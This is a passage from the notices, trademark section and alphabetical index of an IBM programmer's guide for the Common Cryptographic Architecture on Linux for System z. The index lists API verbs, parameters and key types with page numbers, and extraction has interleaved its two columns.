information could include technical inaccuracies or typographical errors. Changes are periodically +made to the information herein; these changes will be incorporated in new editions of the publication. IBM +may make improvements and/or changes in the product(s) and/or the program(s) described in this +publication at any time without notice. +Any references in this information to non-IBM Web sites are provided for convenience only and do not in +any manner serve as an endorsement of those Web sites. The materials at those Web sites are not part of +the materials for this IBM product and use of those Web sites is at your own risk. +IBM may use or distribute any of the information you supply in any way it believes appropriate without +incurring any obligation to you. +Licensees of this program who wish to have information about it for the purpose of enabling: (i) the +exchange of information between independently created programs and other programs (including this one) +and (ii) the mutual use of the information which has been exchanged, should contact: +IBM Corporation +Mail Station P300 +2455 South Road +©CopyrightIBMCorp.2007,2011 561 + +Poughkeepsie, NY 12601-5400 +USA +Such information may be available, subject to appropriate terms and conditions, including in some cases, +payment of a fee. +The licensed program described in this information and all licensed material available for it are provided by +IBM under terms of the IBM CustomerAgreement, IBM International Program LicenseAgreement, or any +equivalent agreement between us. +Information concerning non-IBM products was obtained from the suppliers of those products, their +published announcements or other publicly available sources. IBM has not tested those products and +cannot confirm the accuracy of performance, compatibility or any other claims related to non-IBM products. +Questions on the capabilities of non-IBM products should be addressed to the suppliers of those products. +This information contains examples of data and reports used in daily business operations. To illustrate +them as completely as possible, the examples include the names of individuals, companies, brands, and +products.All of these names are fictitious and any similarity to the names and addresses used by an +actual business enterprise is entirely coincidental. +COPYRIGHT LICENSE: This information contains sample application programs in source language, which +illustrate programming techniques on various operating platforms. You may copy, modify, and distribute +these sample programs in any form without payment to IBM, for the purposes of developing, using, +marketing or distributing application programs conforming to the application programming interface for the +operating platform for which the sample programs are written. These examples have not been thoroughly +tested under all conditions. IBM, therefore, cannot guarantee or imply reliability, serviceability, or function +of these programs. The sample programs are provided "AS IS", without warranty of any kind. IBM shall not +be liable for any damages arising out of your use of the sample programs. +If you are viewing this information softcopy, the photographs and color illustrations may not appear. +Programming interface information +This book documents intended Programming Interfaces that allow the customer to write programs to obtain +the services of the Common CryptographicArchitecture. +Trademarks +IBM, the IBM logo, and ibm.com® are trademarks or registered trademarks of International Business +Machines Corp., registered in many jurisdictions worldwide. Other product and service names might be +trademarks of IBM or other companies.Acurrent list of IBM trademarks is available on the Web at +"Copyright and trademark information" at: +www.ibm.com/legal/copytrade.shtml +Adobe is either a registered trademark or trademark ofAdobe Systems Incorporated in the United States, +and/or other countries. +Intel is a trademark or registered trademark of Intel Corporation or its subsidiaries in the United States and +other countries. +Java and all Java-based trademarks and logos are trademarks or registered trademarks of Oracle and/or +its affiliates. +Linux is a registered trademark of Linus Torvalds in the United States, other countries, or both. +562 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Microsoft, Windows, Windows NT, and the Windows logo are trademarks of Microsoft Corporation in the +United States, other countries, or both. +UNIX is a registered trademark of The Open Group in the United States and other countries. +Other company, product, and service names may be trademarks or service marks of others. +Notices 563 + +564 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Index +Numerics AESKeyRecordList(CSNBAKRL) (continued) +requiredcommands 272 +3621PINblockformat 308,479 +AESKeyRecordRead(CSNBAKRR) 274 +3624PINblockformat 308,479 +format 274 +4700-PAD 497 +JNIversion 275 +4704-EPPPINblockformat 308 +parameters 274 +4764CryptoExpress2feature xv +relatedinformation 275 +4765CryptoExpress3feature xv +requiredcommands 274 +restrictions 274 +A AESKeyRecordWrite(CSNBAKRW) 276 +format 276 +aboutthisdocument xv JNIversion 277 +accesscontrol 12 parameters 276 +accesscontrolpoint(ACP) 515 relatedinformation 277 +accesscontrolpoints requiredcommands 277 +CPACF 9 restrictions 277 +accesscontrolverbs 515 AESkeystorage 90,261 +accesscontrol, AESmasterkey 25,128 +description 7 AESNMK 69 +accessibility 559 AESOMK 70 +ACP AESPKAMasterKey(APKA-MK) 47 +remotekeyloading 34 AESverb 40 +ACTIVE 404 AES-MK 25,94,145,150 +adapterID AESDATA 123 +coprocessor 63 AESDATAkeytype 27 +adapterserialnumber 66,67,68,70,71 AESKW 128 +ADAPTER1 59 AESKWwrappedpayload 439 +ADD-PART 136,137,139 AESKWwrapping 24 +ADJUST 105,145,151 AESTOKEN 122,123 +adpter AESTOKENkeytype 27 +pendingchange 66 algorithm 36 +AES 122,156,164,179,198,201,205 3624PINgeneration 481 +AESCMK 70 3624PINverification 483 +AESencryptionalgorithm 222,228 DES 19,36 +AESinternalkey-token ECDSA 47 +flagbyte 422 GBPPINgeneration 481 +AESkey 9 GBPPINverification 485 +managing 99 GBP-PIN 339 +translation 9 IBM-PIN 339 +AESKeyRecordCreate(CSNBAKRC) 267 IBM-PINO 339 +format 267 InterbankPINgeneration 489 +JNIversion 268 PINoffsetgeneration 482 +parameters 267 PIN,detailed 480 +relatedinformation 268 PIN,general 37 +requiredcommands 268 PKA 47 +restrictions 268 PVVgeneration 488 +AESKeyRecordDelete(CSNBAKRD) 269 PVVverification 489 +format 269 RSA 47 +JNIversion 270 VISAPIN 487 +parameters 269 VISA-PVV 319,339 +relatedinformation 270 VISAPVV4 339 +requiredcommands 270 AMEX-CSC 102,157,170 +restrictions 270 AMEX-CSCkeysubtype 28 +AESKeyRecordList(CSNBAKRL) 271 ANSI9.9-1algorithm 233 +format 271 ANSIX3.106 495 +JNIversion 272 ANSIX3.106(CBC) 496 +parameters 271 ANSIX9.102 24 +relatedinformation 272 ANSIX9.19 241 +©CopyrightIBMCorp.2007,2011 565 + +ANSIX9.19optionaldoubleMACprocedure 233 block_sizeparameter +ANSIX9.19OptionalProcedure1MAC 503 SymmetricAlgorithmDecipherverb 223 +ANSIX9.23 495 SymmetricAlgorithmEncipherverb 229 +ANSIX9.23cipherblockchaining 497 Byte* +ANSIX9.23padding 213 description 17 +ANSIX9.23processingrule 211,215,219 +Decipher 213 +C +Encipher 217 +ANSIX9.24 22,176 c-variable_encrypting_key_identifierparameter +ANSIX9.30 360,364 CryptographicVariableEncipherverb 107 +ANSIX9.31 360,361,364,365 calculationmethod +ANSIX9.31hashformat 513 MACpaddingmethod 502 +ANSIX9.8 xv,336 MessageAuthenticationCode(MAC) 502 +ANSIX9.8PINblockformat 477 ModificationDetectionCode(MDC) 493 +ANSIX9.8PINrestriction 306 X9.19method 502 +ANSIX9.9MAC 502 callableservice 12 +ANSIX9.9-1 241 CBCprocessingrule 212,215,219,223,228 +ANSIX9.9 102,157,170 Decipher 213 +ANSIX9.9keysubtype 28 Encipher 217 +ANY 102,157,170 SymmetricAlgorithmDecipher 221 +ANYkeysubtype 28 SymmetricAlgorithmEncipher 226 +ANY-MAC 102,157,170 CCA +ANY-MACkeysubtype 28 functions 19 +APARfixes overview 19 +z/VM xviii,539 CCAaccesscontrol 5 +APKACMK 71 CCAAPI 3,7 +APKANMK 71 CCAAPIbuilddate 61,62 +APKAOMK 71 CCAAPIversion 61,62 +APKA-MK 47,94,145,152,386 CCAapplication +applicationprograms compile 16 +servicerequest 7 Java 16 +array_key_left_identifierparameter link 16 +ControlVectorTranslateverb 104 CCADES-keyverification 492 +array_key_right_identifierparameter CCAdescription 5 +ControlVectorTranslateverb 104 CCAerrorlog 63 +asym_encrypted_keyparameter CCAfunctionaloverview 4 +RemoteKeyExportverb 399 CCAinstallation 541 +asym_encrypted_key_lengthparameter CCAlibrary 7,11 +RemoteKeyExportverb 398 access 16 +ASYM-MK 25,47,94,95,145,150,386 location 7 +asymmetricCMKstatus 62 CCAmanagement 3 +asymmetrickeysmasterkey 25 CCAmasterkey 6 +asymmetricNMKstatus 62 establishing 6 +asymmetricOMKstatus 62 CCAnodesandresourcecontrolverb 57 +authenticatingmessages 233 CCAnodesandresourcecontrolverbs 40 +authentication 3,36 CCAprogramming 3,12 +authentication_issuer_master_key_identifierparameter CCARPM +PINChange/Unblockverb 343 configure 543 +authentication_issuer_master_key_lengthparameter download 541 +PINChange/Unblockverb 343 files 542 +AutomatedTellerMachine(ATM) 34 groups 543 +samples 543 +uninstall 547 +B +CCAsampleprogram 527 +baseCCAservices 65 C 527 +batteryindicator 63 Java 532 +battery-backedRAM CCAservices +size 63 base 65 +Bellare-Rogaway 513 CCAsoftwaresupport 4 +blockchaining 211 CCAsystemsetup 537 +CCAverb 3,40,55 +566 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +CCAverbdescription 6 clearkey 10,11,150,211 +CentralProcessorAssistforCryptographicFunctions definition 30 +(CPACF) xvi,xviii,8,539 protecting 211 +certificateparameter ClearKeyImport(CSNBCKI) 100 +RemoteKeyExportverb 396 format 100 +certificate_lengthparameter JNIversion 100 +RemoteKeyExportverb 396 parameters 100 +certificate_parmsparameter requiredcommands 100 +RemoteKeyExportverb 396 ClearPINEncrypt(CSNBCPE) 312 +certificate_parms_lengthparameter format 312 +RemoteKeyExportverb 396 JNIversion 314 +CEX2C xv,xvi,xvii,xviii,31,47,48,58,61,549 parameters 312 +CEX2Ccoprocessors 5 requiredcommands 313 +CEX3C xv,xvi,xvii,xviii,3,5,9,10,11,31,38,47, restrictions 313 +48,58,61,66,86,166,265,306,539,549 ClearPINGenerate(CSNBPGN) 315 +dataprotection 19 format 315 +chain_dataparameter JNIversion 317 +SymmetricAlgorithmDecipherverb 224 parameters 315 +SymmetricAlgorithmEncipherverb 229 relatedinformation 317 +chain_data_lengthparameter requiredcommands 317 +SymmetricAlgorithmDecipherverb 224 usagenotes 317 +SymmetricAlgorithmEncipherverb 229 ClearPINGenerateAlternate(CSNBCPA) 318 +chaining_vectorparameter extractionrules 480 +Decipherverb 215 format 318 +Encipherverb 219 JNIversion 321 +HMACGenerateverb 236 parameters 318 +HMACVerifyverb 239 requiredcommands 320 +MACGenerateverb 243 clear_keyparameter +MACVerifyverb 247 ClearKeyImportverb 100 +MDCGenerateverb 251 MultipleClearKeyImportverb 180 +One-WayHashverb 259 clear_key_bit_lengthparameter +chaining_vector_lengthparameter KeyGenerate2verb 129 +HMACGenerateverb 236 KeyTokenBuild2verb 160 +HMACVerifyverb 239 clear_key_lengthparameter +One-WayHashverb 259 MultipleClearKeyImportverb 180 +changingcontrolvectors 472 clear_key_valueparameter +CHECK 276,297 KeyTokenBuild2verb 160 +ChineseRemainderTheorem 183,372,377,378,380, clear_master_keyparameter +389,426,427,428,430,433 KeyStorageInitializationverb 91 +CIPHER 102,114,117,123,133,155,170 clear_PINparameter +cipherblockchaining 22 ClearPINEncryptverb 313 +cipherblockchaining(CBC) 211 clear_textparameter +CipherBlockChaining(CBC) 107 Decipherverb 215 +CIPHERkeytype 27 Encipherverb 218 +CIPHERkeys SecureMessagingforKeysverb 349 +definition 26 SecureMessagingforPINsverb 352 +cipher_textparameter CLEARPIN 351 +Decipherverb 214 cleartextparameter +Encipherverb 220 SymmetricAlgorithmDecipherverb 225 +Cipher-BlockChaining(CBC)mode xv SymmetricAlgorithmEncipherverb 229 +cipheringmethods 494 cleartext_lengthparameter +ciphertext 107 SymmetricAlgorithmDecipherverb 224 +deciphering 211 SymmetricAlgorithmEncipherverb 229 +ciphertextparameter CLR-A128 144 +CryptographicVariableEncipherverb 108 CLR-A192 144 +SymmetricAlgorithmDecipherverb 224 CLR-A256 144 +SymmetricAlgorithmEncipherverb 230 CLR8-ENC 102,103,114,157,170 +ciphertext_lengthparameter CLRAES 155 +SymmetricAlgorithmDecipherverb 224 CLRAESkeytype 27 +SymmetricAlgorithmEncipherverb 229 CLRDES 156 +CLEAR 371 CLRDESkeytype 27 +Index 567 + +CMK 264 ControlVectorGenerate(CSNBCVG) (continued) +CMKstatus 61 keytype 102 +coexistence 549 parameters 102 +commands usagenotes 103 +description 7 controlvectorkeywordcombinations 29 +CommonCryptographicArchitecture(CCA) controlvectorlength 74 +description xv,xvi controlvectortable 463 +commonparameters 14 ControlVectorTranslate(CSNBCVT) 104,472 +COMPLET 137 format 104 +COMPLETE 136,137,139 JNIversion 106 +concurrentinstallations 549 parameters 104 +contactIBM xx requiredcommands 105 +continueprocessingrule 215,219,223,228 usagenotes 105 +controlinformation controlvectors,changing 472 +forClearPINEncrypt 313 control_vectorparameter +forClearPINGenerate 315 ControlVectorGenerateverb 103 +forControlVectorGenerate 102 KeyTokenBuildverb 157 +forControlVectorTranslate 105 KeyTokenParseverb 171 +forCVVGenerate 322 Control-vector-basebitmaps 465 +forCVVVerify 325 coprocessor +forDecipher 215 batteryindicator 63 +forDigitalSignatureGenerate 361 CCAerrorlog 63 +forDigitalSignatureVerify 365 intrusionlatch 63 +forDiversifiedKeyGenerate 114 lastfivecommands 64 +forEncipher 219 numberof 62 +forEncryptedPINGenerate 329 power-supplyvoltage 64 +forKeyPartImport 137 radiation 64 +forKeyTest 144 tampering 64 +forKeyTestExtended 151 temperature 64 +forKeyTokenChange2 166 coprocessoradapterID 63 +forMACGenerate 242 coprocessorcertification 6 +forMACVerify 246 coprocessorEClevel 63 +forMDCGenerate 250 coprocessorpartnumber 63 +forMultipleClearKeyImport 179 coprocessorresourceselection 86,88 +forOne-WayHash 258 coprocessorserialnumber 63 +forPINChange/Unblock 343 CPACF xvi,xviii,8,10,11,87,213,218,241,245, +forPKADecrypt 182 539 +forPKAEncrypt 185 accesscontrolpoints 9 +forPKAKeyGenerate 371 clearkey 9 +forPKAKeyImport 374 defaultcard 11 +forPKAKeyRecordDelete 290 disablingforclearkey 8 +forPKAKeyRecordWrite 297 disablingforprotectedkey 9 +forPKAKeyTokenBuild 378 environmentvariable 8 +forSecureMessagingforKeys 348 illustration 10 +forSecureMessagingforPINs 351 preparationatstartup 11 +forSymmetricAlgorithmDecipher 222 protectedkey 9 +forSymmetricAlgorithmEncipher 227 usingprotectedkey 11 +forSymmetricKeyExport 198 CPACFfunctions 11 +forSymmetricKeyGenerate 201 CPACFserviceaction 10 +forsymmetrickeyimport 208 CPINENC 102,157,170 +forSymmetricKeyImport 205 CPINGEN 102,157,170 +forTransactionValidation 355 CPINGENA 102,157,170 +forTrustedBlockCreate 404 CryptoExpress2feature xv,xvi +controlvector 23,74,102,104,113,115,123,124, CryptoExpress3feature xv +133,155,169,189,213 cryptographicdevicedriver +definition 19,25 installing 537 +description 463 cryptographicengine 5 +value 463 CryptographicFacilityQuery(CSUACFQ) xviii,31,32, +ControlVectorGenerate(CSNBCVG) 29,102 58,72 +format 102 format 58 +JNIversion 103 informationreturned 60 +568 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +CryptographicFacilityQuery(CSUACFQ) (continued) CSNBCSVJ 327 +JNIversion 83 CSNBCVE(CryptographicVariableEncipher) 107 +parameters 59 CSNBCVEJ 108 +requiredcommands 83 CSNBCVG(ControlVectorGenerate) 102 +restrictions 83 CSNBCVGJ 103 +CryptographicFacilityVersion(CSUACFV) 84 CSNBCVT(ControlVectorTranslate) 104 +format 84 CSNBCVTJ 106 +JNIversion 84 CSNBDEC(Decipher) 213 +parameters 84 CSNBDECJ 216 +restrictions 84 CSNBDKG(DiversifiedKeyGenerate) 113 +cryptographickey CSNBDKGJ 116 +function 19 CSNBDKM(DataKeyImport) 111 +CryptographicResourceAllocate(CSUACRA) 8,31, CSNBDKMJ 112 +86 CSNBDKX(DataKeyExport) 109 +format 86 CSNBDKXJ 110 +JNIversion 87 CSNBENC(Encipher) 217 +parameters 86 CSNBENCJ 220 +scope 32 CSNBEPG(EncryptedPINGenerate) 328 +usagenotes 87 CSNBEPGJ 331 +CryptographicResourceDeallocate(CSUACRD) 8, CSNBHMG(HMACGenerate) 235 +31,88 CSNBHMGJ 237 +format 88 CSNBHMV(HMACVerify) 238 +JNIversion 89 CSNBHMVJ 240 +parameters 88 CSNBKEX(KeyExport) 117 +scope 32 CSNBKEXJ 118 +usagenotes 89 CSNBKGN(KeyGenerate) 120 +cryptographicservicesaccesslayer 7 CSNBKGN2(KeyGenerate2) 128 +CryptographicUnitSupportProgram(CUSP) CSNBKGN2J 132 +Decipher 213 CSNBKGNJ 127 +Encipher 217 CSNBKIM(KeyImport) 133 +CryptographicVariableEncipher(CSNBCVE) 107 CSNBKIMJ 135 +format 107 CSNBKPI(KeyPartImport) 136 +JNIversion 108 CSNBKPI2(KeyPartImport2) 139 +parameters 107 CSNBKPI2J 141 +requiredcommands 108 CSNBKPIJ 138 +restrictions 108 CSNBKRC(DESKeyRecordCreate) 278 +CSC-3 355,356 CSNBKRCJ 278 +CSC-345 355,356 CSNBKRD(DESKeyRecordDelete) 280 +CSC-4 355,356 CSNBKRDJ 281 +CSC-5 355,356 CSNBKRL(DESKeyRecordList) 282 +CSNBAKRC(AESKeyRecordCreate) 267 CSNBKRLJ 283 +CSNBAKRCJ 268 CSNBKRR(DESKeyRecordRead) 284 +CSNBAKRD(AESKeyRecordDelete) 269 CSNBKRRJ 284 +CSNBAKRDJ 270 CSNBKRW(DESKeyRecordWrite) 286 +CSNBAKRL(AESKeyRecordList) 271 CSNBKRWJ 287 +CSNBAKRLJ 272 CSNBKSI(KeyStorageInitialization) 90 +CSNBAKRR(AESKeyRecordRead) 274 CSNBKSIJ 91 +CSNBAKRRJ 275 CSNBKTB(KeyTokenBuild) 155 +CSNBAKRW(AESKeyRecordWrite) 276 CSNBKTB2(KeyTokenBuild2) 159 +CSNBAKRWJ 277 CSNBKTB2J 162 +CSNBCKI(ClearKeyImport) 100 CSNBKTBJ 157 +CSNBCKIJ 100 CSNBKTC(KeyTokenChange) 163 +CSNBCKM(MultipleClearKeyImport) 179 CSNBKTC2(KeyTokenChange2) 166 +CSNBCKMJ 181 CSNBKTC2J 167 +CSNBCPA(ClearPINGenerateAlternate) 318 CSNBKTCJ 165 +CSNBCPAJ 321 CSNBKTP(KeyTokenParse) 169 +CSNBCPE(ClearPINEncrypt) 312 CSNBKTPJ 172 +CSNBCPEJ 314 CSNBKTR(KeyTranslate) 173 +CSNBCSG(CVVGenerate) 322 CSNBKTR2(KeyTranslate2) 175 +CSNBCSGJ 324 CSNBKTR2J 177 +CSNBCSV(CVVVerify) 325 CSNBKTRJ 174 +Index 569 + +CSNBKYT(KeyTest) 143 CSNDPKBJ 383 +CSNBKYT2(KeyTest2) 147 CSNDPKD(PKADecrypt) 182 +CSNBKYT2J 149 CSNDPKDJ 184 +CSNBKYTJ 146 CSNDPKE(PKAEncrypt) 185 +CSNBKYTX(KeyTestExtended) 150 CSNDPKEJ 187 +CSNBKYTXJ 153 CSNDPKG(PKAKeyGenerate) 370 +CSNBMDG(MDCGenerate) 249 CSNDPKGJ 373 +CSNBMDGJ 251 CSNDPKI(PKAKeyImport) 374 +CSNBMGN(MACGenerate) 241 CSNDPKIJ 376 +CSNBMGNJ 243 CSNDPKT(PKAKeyTranslate) 388 +CSNBMKP(MasterKeyProcess) 93 CSNDPKTJ 390 +CSNBMKPJ 96 CSNDPKX(PKAPublicKeyExtract) 392 +CSNBMVR(MACVerify) 245 CSNDPKXJ 393 +CSNBMVRJ 248 CSNDRKD(RetainedKeyDelete) 299 +CSNBOWH(One-WayHash) 258 CSNDRKDJ 300 +CSNBOWHJ 260 CSNDRKL(RetainedKeyList) 301 +CSNBPCU(PINChange/Unblock) 342 CSNDRKLJ 302 +CSNBPCUJ 346 CSNDRKX(RemoteKeyExport) 394 +CSNBPEX(ProhibitExport) 188 CSNDRKXJ 401 +CSNBPEXJ 188 CSNDSYG(SymmetricKeyGenerate) 201 +CSNBPEXX(ProhibitExportExtended) 189 CSNDSYGJ 204 +CSNBPEXXJ 189 CSNDSYI(SymmetricKeyImport) 205 +CSNBPGN(ClearPINGenerate) 315 CSNDSYI2(SymmetricKeyImport2) 208 +CSNBPGNJ 317 CSNDSYI2J 210 +CSNBPTR(EncryptedPINTranslate) 332 CSNDSYIJ 207 +CSNBPTRJ 336 CSNDSYX(SymmetricKeyExport) 198 +CSNBPVR(EncryptedPINVerify) 338 CSNDSYXJ 200 +CSNBPVRJ 341 CSNDTBC(TrustedBlockCreate) 403 +CSNBRKA(RestrictKeyAttribute) 195 CSNDTBCJ 406 +CSNBRKAJ 196 CSU_DEFAULT_ADAPTER 31,87,89 +CSNBRNG(RandomNumberGenerate) 191 CSU_HCPUACLR 8,251 +CSNBRNGJ 191 affectedverbs 8 +CSNBRNGL(RandomNumberGenerateLong) 193 CSU_HCPUAPRT 8,9 +CSNBRNGLJ 194 affectedverbs 9 +CSNBSAD(SymmetricAlgorithmDecipher) 221 CSUACFQ(CryptographicFacilityQuery) 58 +CSNBSADJ 225 CSUACFQJ 83 +CSNBSAE(SymmetricAlgorithmEncipher) 226 CSUACFV(CryptographicFacilityVersion) 84 +CSNBSAEJ 230 CSUACFVJ 85 +CSNBSKY(SecureMessagingforKeys) 348 CSUACRA(CryptographicResourceAllocate) 86 +CSNBSKYJ 350 CSUACRAJ 87 +CSNBSPN(SecureMessagingforPINs) 351 CSUACRD(CryptographicResourceDeallocate) 88 +CSNBSPNJ 354 CSUACRDJ 89 +CSNBTRV(TransactionValidation) 355 CSUAESDS 262,267,269,271,274,276,552 +CSNBTRVJ 357 CSUAESLD 272,552 +CSNDDSG(DigitalSignatureGenerate) 360 CSUARNT(RandomNumberTests) 97 +CSNDDSGJ 363 CSUARNTJ 98 +CSNDDSV(DigitalSignatureVerify) 364 CSUCACHE 8 +CSNDDSVJ 366 CSUDESDS 262,278,280,282,284,286 +CSNDKRC(PKAKeyRecordCreate) 288 CSUPKADS 262,288,290,292,295,297 +CSNDKRCJ 289 current_reference_PIN_blockparameter +CSNDKRD(PKAKeyRecordDelete) 290 PINChange/Unblockverb 344 +CSNDKRDJ 291 current_reference_PIN_key_identifierparameter +CSNDKRL(PKAKeyRecordList) 292 PINChange/Unblockverb 344 +CSNDKRLJ 293 current_reference_PIN_key_lengthparameter +CSNDKRR(PKAKeyRecordRead) 295 PINChange/Unblockverb 344 +CSNDKRRJ 296 current_reference_PIN_PAN_dataparameter +CSNDKRW(PKAKeyRecordWrite) 297 PINChange/Unblockverb 345 +CSNDKRWJ 298 current_reference_PIN_profileparameter +CSNDKTC(PKAKeyTokenChange) 385 PINChange/Unblockverb 344 +CSNDKTCJ 387 CUSPprocessingrule 215,219 +CSNDPKB(PKAKeyTokenBuild) 377 +570 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +customer_dataparameter datakey (continued) +PKAKeyTokenBuildverb 382 import 111 +customer_data_lengthparameter importing 100 +PKAKeyTokenBuildverb 382 re-encipher 109 +CV 156,170 DataKeyExport(CSNBDKX) 109 +CVARDEC 102,123,124,155,170 format 109 +CVARDECkeytype 27 JNIversion 109 +CVARENC 102,107,123,124,155,170 parameters 109 +CVARENCkeytype 27 requiredcommands 109 +CVARPINE 102,123,155,170 restrictions 109 +CVARPINEkeytype 27 DataKeyImport(CSNBDKM) 111 +CVARXCVL 102,104,123,155,170 format 111 +CVARXCVLkeytype 27 JNIversion 112 +CVARXCVR 102,104,123,155,170 parameters 111 +CVARXCVRkeytype 27 requiredcommands 111 +CVVGenerate(CSNBCSG) 322 restrictions 111 +format 322 usagenotes 111 +JNIversion 324 DATAkeysubtype 28 +parameters 322 DATAkeytype 27 +requiredcommands 324 dataparameter +CVVVerify(CSNBCSV) 325 DiversifiedKeyGenerateverb 115 +format 325 data_arrayparameter +JNIversion 327 ClearPINGenerateAlternateverb 320 +parameters 325 ClearPINGenerateverb 316 +requiredcommands 327 EncryptedPINGenerateverb 329 +CVV_key_A_Identifierparameter EncryptedPINVerifyverb 340 +CVVGenerateverb 323 data_lengthparameter +CVVVerifyverb 326 DiversifiedKeyGenerateverb 115 +CVV_key_B_Identifierparameter data_structureparameter +CVVGenerateverb 323 PKADecryptverb 183 +CVVVerifyverb 326 PKAEncryptverb 186 +CVV_valueparameter data_structure_lengthparameter +CVVGenerateverb 323 PKADecryptverb 183 +CVVVerifyverb 326 PKAEncryptverb 186 +CVV-1 323,326 data-encryptingkey +CVV-2 323,326 definition 25 +CVV-3 323,326 generating 459 +CVV-4 323,326 length 25 +CVV-5 323,326 DATAC 25,102,114,117,133,155,170,459 +CVVKEY-A 102,157,170 DATACkeytype 27 +CVVKEY-Akeysubtype 28 DATAM 26,102,114,117,118,123,133,155,170, +CVVKEY-B 102,157,170 459 +CVVKEY-Bkeysubtype 28 DATAMkeytype 27 +DATAMV 102,114,117,123,133,155,170 +DATAMVkeytype 27 +D +dataset_nameparameter +DALL 102,157,170 AESKeyRecordListverb 272 +data DESKeyRecordListverb 282 +decipher 36 PKAKeyRecordListverb 293 +deciphering 213 dataset_name_lengthparameter +encipher 36 AESKeyRecordListverb 272 +enciphering 217 DESKeyRecordListverb 282 +protecting 211 PKAKeyRecordListverb 293 +DATA 102,111,114,117,120,122,123,133,155, DATAXLAT 123 +157,170,173,179,198,201,205,213,459 DATAXLATkeytype 27 +dataconfidentiality 3 date 65 +dataintegrity 3 dayoftheweek 66 +managing 36 DDATA 102,157,170 +verifying 233 de-allocatingacoprocessorresource 88 +datakey DECIPHER 102,117,123,133,155,170 +export 109 Decipher(CSNBDEC) 213 +Index 571 + +Decipher(CSNBDEC) (continued) DESKeyRecordWrite(CSNBKRW) (continued) +format 214 restrictions 286 +JNIversion 215 DESkeystorage 90,261 +parameters 214 DESkeytoken 107 +requiredcommands 215 DESkey-storageinitialization 90 +restrictions 215 DESNMK 67,68,69,70,71 +DECIPHERkeytype 27 DESOMK 67,68,69,70,72 +Decipherprocessingrule 213 DESverb 40 +defaultcard 11 devicekey 6 +DES 156,164,179,198,201,205 DEXP 102,157,170 +DESalgorithm 19,36,211 digitalsignature 3 +DESCMK 67,68,69,70,71 using 360 +DEScryptographickeyverb 100 DigitalSignatureGenerate(CSNDDSG) 360 +DEScryptography 19 format 360 +DESencryption JNIversion 363 +56-bit 65 parameters 360 +triple 212 requiredcommands 362 +DESencryptionalgorithm 215 restrictions 362 +DESencryptionalgorithmprocessingrule 219 digitalsignatureverb 48 +DESengine 7 DigitalSignatureVerify(CSNDDSV) 364 +DESexternalkeytokenformat 424 format 364 +DEShardwareversion 62 JNIversion 366 +DESinternalkeytokenformat 421 parameters 364 +DESkey 9 relatedinformation 366 +managing 99 requiredcommands 366 +questionable 95 restrictions 366 +translation 9 DIMP 102,157,170 +DESkeyflow 20 directoryserver 7 +DESKeyRecordCreate(CSNBKRC) 278 DiversifiedKeyGenerate(CSNBDKG) 113 +format 278 format 113 +JNIversion 278 JNIversion 116 +parameters 278 parameters 113 +relatedinformation 278 requiredcommands 115 +requiredcommands 278 usagenotes 116 +restrictions 278 DKYGENKY 102,114,115,123,155,170 +DESKeyRecordDelete(CSNBKRD) 280 DKYGENKYkeytype 27 +format 280 DKYL0 102,157,170 +JNIversion 281 DKYL1 102,157,170 +parameters 280 DKYL2 102,157,170 +relatedinformation 281 DKYL3 102,157,170 +requiredcommands 280 DKYL4 102,157,170 +restrictions 280 DKYL5 102,157,170 +DESKeyRecordList(CSNBKRL) 282 DKYL6 102,157,170 +format 282 DKYL7 102,157,170 +JNIversion 283 DMAC 102,157,170 +parameters 282 DMKEY 102,157,170 +relatedinformation 283 DMPIN 102,157,170 +requiredcommands 283 DMV 102,157,170 +DESKeyRecordRead(CSNBKRR) 284 DOUBLE 102,122,157,170,202 +format 284 doublelengthkey 22,23 +JNIversion 284 double-lengthkey +parameters 284 multipledecipherment 508 +relatedinformation 284 multipleencipherment 507 +requiredcommands 284 using 27 +restrictions 284 DPVR 102,157,170 +DESKeyRecordWrite(CSNBKRW) 286 DUKPT-BH 334 +format 286 DUKPT-IP 334,340 +JNIversion 286 DUKPT-OP 334 +parameters 286 dynamicRAM(DRAM)memory +relatedinformation 286 size 63 +requiredcommands 286 +572 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +E EncryptedPINVerify(CSNBPVR) (continued) +format 338 +EClevel +JNIversion 341 +coprocessor 63 +parameters 338 +ECBprocessingrule 223,228 +relatedinformation 341 +ECC 374,385 +requiredcommands 341 +ECCkey 360,364 +encrypted_PIN_blockparameter +ECCkeytoken 436 +ClearPINEncryptverb 313 +associateddata 438,439 +ClearPINGenerateAlternateverb 318 +ECC-PAIR 378,379 +EncryptedPINGenerateverb 330 +ECC-PUBL 378,379 +EncryptedPINVerifyverb 339 +ECDSA xv,47,360,361,362,364,365 +encryptionalgorithmprocessingrule +ECDSAalgorithm 47 +AES 222,228 +ECI-1 336 +DES 215,219 +ECI-2PINblockformat 308,479 +encryption_issuer_master_key_identifierparameter +ECI-3PINblockformat 308,479 +PINChange/Unblockverb 343 +ECI-4 336 +encryption_issuer_master_key_lengthparameter +editionnotice ii +PINChange/Unblockverb 343 +electroniccodebook(ECB) 211,504 +ENH-ONLY 102,115,156,157,164,170,176,180, +ElectronicCodeBook(ECB) +202,206 +SymmetricAlgorithmDecipher 221 +entrypoint 12 +SymmetricAlgorithmEncipher 226 +entrypointname +EllipticCurveCryptography(ECC) xv,15,25,91 +prefix 12 +keytoken 47,48,49,51,90,263,360,361,364, +entry-pointnames 12 +370,371,374,377,378 +EnvironmentIdentifier(EID) 65 +EllipticCurveDigitalSignatureAlgorithm(ECDSA) xv, +environmentvariable 542 +47,361,362,365 +CSU_DEFAULT_ADAPTER 31,87,89 +EMV2000 114 +CSU_HCPUACLR 8,251 +EMVMACsmartcardstandard 503 +CSU_HCPUAPRT 8 +EMVMAC 242,246 +CSUAESDS 262,269,271,274,276,552 +EMVMACD 242,246 +CSUAESLD 272,552 +ENC-ZERO 143,145,150 +CSUCACHE 8 +ENCIPHER 102,117,123,133,155,170 +CSUDESDS 262,267,278,280,282,284,286 +Encipher(CSNBENC) 217 +CSUPKADS 262,288,290,292,295,297 +format 218 +keystorage 549,551 +JNIversion 220 +list 551 +parameters 218 +PATH 16 +requiredcommands 220 +EPINGEN 102,157,170 +restrictions 220 